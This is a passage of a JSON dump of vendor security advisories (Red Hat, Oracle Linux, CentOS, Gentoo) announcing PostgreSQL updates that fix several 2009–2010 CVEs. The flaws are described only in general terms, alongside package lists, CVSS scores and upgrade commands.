"PostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nThese packages upgrade PostgreSQL to version 7.4.29. Refer to the\nPostgreSQL Release Notes for a list of changes:\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich correct these issues. If the postgresql service is running, it will\nbe automatically restarted after installing this update.\n", "modified": "2017-09-08T11:51:43", "published": "2010-05-19T04:00:00", "id": "RHSA-2010:0428", "href": "https://access.redhat.com/errata/RHSA-2010:0428", "type": "redhat", "title": "(RHSA-2010:0428) Moderate: postgresql security update", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:47:17", "bulletinFamily": "unix", "description": "[7.3.21-3]\n- Fix CVE-2010-1169, CVE-2010-1170, CVE-2009-4136, CVE-2010-0733, CVE-2010-0442\n via back-ports of upstream patches for Postgres 7.4\nResolves: #589541", "modified": "2010-05-19T00:00:00", "published": "2010-05-19T00:00:00", "id": "ELSA-2010-0427", "href": "http://linux.oracle.com/errata/ELSA-2010-0427.html", "title": "postgresql security update", "type": "oraclelinux", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:37:39", "bulletinFamily": "unix", "description": "[8.1.21-1.el5_5.1]\n- Update to PostgreSQL 8.1.21 to fix CVE-2010-1169, CVE-2010-1170,\n CVE-2009-4136, CVE-2010-0733, CVE-2010-0442, and assorted other bugs\n described at\n http://www.postgresql.org/docs/8.1/static/release.html\nResolves: #586058", "modified": "2010-05-19T00:00:00", "published": "2010-05-19T00:00:00", "id": "ELSA-2010-0429", "href": "http://linux.oracle.com/errata/ELSA-2010-0429.html", "title": "postgresql security update", "type": "oraclelinux", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:17", "bulletinFamily": "unix", "description": "[7.4.29-1.el4_8.1]\n- Update to PostgreSQL 7.4.29 to fix CVE-2010-1169, CVE-2010-1170,\n CVE-2009-4136, CVE-2010-0733, CVE-2010-0442, and assorted other bugs\n described at\n http://www.postgresql.org/docs/7.4/static/release.html\nResolves: #586056\n[7.4.26-1.el4_8.1]\n- Update to PostgreSQL 7.4.26 to fix CVE-2009-0922, CVE-2009-3230,\n and assorted other bugs described at\n http://www.postgresql.org/docs/7.4/static/release.html\nResolves: #525282", "modified": "2010-05-19T00:00:00", "published": "2010-05-19T00:00:00", "id": "ELSA-2010-0428", "href": "http://linux.oracle.com/errata/ELSA-2010-0428.html", "title": "postgresql security update", "type": "oraclelinux", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:45:48", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2010:0427\n\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. Running\nPostgreSQL instances must be restarted (\"service rhdb restart\") for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016640.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016642.html\n\n**Affected packages:**\nrh-postgresql\nrh-postgresql-contrib\nrh-postgresql-devel\nrh-postgresql-docs\nrh-postgresql-jdbc\nrh-postgresql-libs\nrh-postgresql-pl\nrh-postgresql-python\nrh-postgresql-server\nrh-postgresql-tcl\nrh-postgresql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0427.html", "modified": "2010-05-21T23:08:29", "published": "2010-05-21T23:01:26", "href": "http://lists.centos.org/pipermail/centos-announce/2010-May/016640.html", "id": "CESA-2010:0427", "title": "rh security update", "type": "centos", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:33", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2010:0429\n\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nThese packages upgrade PostgreSQL to version 8.1.21. Refer to the\nPostgreSQL Release Notes for a list of changes:\n\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich correct these issues. If the postgresql service is running, it will\nbe automatically restarted after installing this update.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016650.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016652.html\n\n**Affected packages:**\npostgresql\npostgresql-contrib\npostgresql-devel\npostgresql-docs\npostgresql-libs\npostgresql-pl\npostgresql-python\npostgresql-server\npostgresql-tcl\npostgresql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0429.html", "modified": "2010-05-28T11:45:13", "published": "2010-05-28T11:45:13", "href": "http://lists.centos.org/pipermail/centos-announce/2010-May/016650.html", "id": "CESA-2010:0429", "title": "postgresql security update", "type": "centos", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:53", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2010:0428\n\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nThese packages upgrade PostgreSQL to version 7.4.29. Refer to the\nPostgreSQL Release Notes for a list of changes:\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich correct these issues. If the postgresql service is running, it will\nbe automatically restarted after installing this update.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016645.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016646.html\n\n**Affected packages:**\npostgresql\npostgresql-contrib\npostgresql-devel\npostgresql-docs\npostgresql-jdbc\npostgresql-libs\npostgresql-pl\npostgresql-python\npostgresql-server\npostgresql-tcl\npostgresql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0428.html", "modified": "2010-05-21T23:23:21", "published": "2010-05-21T23:22:02", "href": "http://lists.centos.org/pipermail/centos-announce/2010-May/016645.html", "id": "CESA-2010:0428", "title": "postgresql security update", "type": "centos", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:37", "bulletinFamily": "unix", "description": "### Background\n\nPostgreSQL is an open source object-relational database management system. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PostgreSQL. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote authenticated attacker could send a specially crafted SQL query to a PostgreSQL server with the \"intarray\" module enabled, possibly resulting in the execution of arbitrary code with the privileges of the PostgreSQL server process, or a Denial of Service condition. Furthermore, a remote authenticated attacker could execute arbitrary Perl code, cause a Denial of Service condition via different vectors, bypass LDAP authentication, bypass X.509 certificate validation, gain database privileges, exploit weak blowfish encryption and possibly cause other unspecified impact. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PostgreSQL 8.2 users should upgrade to the latest 8.2 base version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-base-8.2.22:8.2\"\n \n\nAll PostgreSQL 8.3 users should upgrade to the latest 8.3 base version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-base-8.3.16:8.3\"\n \n\nAll PostgreSQL 8.4 users should upgrade to the latest 8.4 base version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-base-8.4.9:8.4\"\n \n\nAll PostgreSQL 9.0 users should upgrade to the latest 9.0 base version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-base-9.0.5:9.0\"\n \n\nAll PostgreSQL 8.2 server users should upgrade to the latest 8.2 server version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-server-8.2.22:8.2\"\n \n\nAll PostgreSQL 8.3 server users should upgrade to the latest 8.3 server version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-server-8.3.16:8.3\"\n \n\nAll PostgreSQL 8.4 server users should upgrade to the latest 8.4 server version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-server-8.4.9:8.4\"\n \n\nAll PostgreSQL 9.0 server users should upgrade to the latest 9.0 server version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-server-9.0.5:9.0\"\n \n\nThe old unsplit PostgreSQL packages have been removed from portage. Users still using them are urged to migrate to the new PostgreSQL packages as stated above and to remove the old package: \n \n \n # emerge --unmerge \"dev-db/postgresql\"", "modified": "2012-03-05T00:00:00", "published": "2011-10-25T00:00:00", "id": "GLSA-201110-22", "href": "https://security.gentoo.org/glsa/201110-22", "type": "gentoo", "title": "PostgreSQL: Multiple vulnerabilities", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}